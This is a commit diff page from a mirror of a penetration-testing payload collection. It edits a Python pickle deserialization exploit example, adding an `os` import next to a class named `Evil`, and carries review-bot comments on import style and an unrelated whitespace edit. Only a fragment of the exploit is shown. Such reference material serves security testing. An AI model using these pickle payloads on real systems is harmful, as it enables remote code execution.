mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-18 12:26:14 +02:00

import os

nerrorsec 2022-03-24 11:54:34 +05:45 committed by GitHub
parent d40e055629
commit df8493e4e6
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

@ -32,7 +32,7 @@ Python 2.7 documentation clearly states Pickle should never be used with untrust
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source. > The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python ```python
import cPickle import cPickle, os
from base64 import b64encode, b64decode from base64 import b64encode, b64decode
class Evil(object): class Evil(object):
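Review bot: `import cPickle, os` on new line 34 puts two modules in one import statement; PEP 8 asks for one module per line, so write `import cPickle` and `import os` separately. The visible context does not show where `os` is used, so the commit message ("import os") would be clearer if it named the use in the example that needs it. `cPickle` exists only on Python 2, which matches the Python 2.7 reference in the hunk header; a short comment saying so would save Python 3 readers a failed import.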
@ -47,4 +47,4 @@ print("Your Evil Token : {}").format(evil_token)
## References ## References
* [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/) * [Exploiting misuse of Python's "pickle" - Mar 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)
* [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/) * [Python Pickle Injection - Apr 30, 2017](http://xhyumiracle.com/python-pickle-injection/)
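Review bot: the reference lines rendered in this hunk (from line 47) read identically on both sides, so the change it records is not visible and looks like a whitespace or end-of-file newline edit. That is unrelated to the `os` import; split it into its own commit or mention it in the commit message so the history explains why the References section was touched.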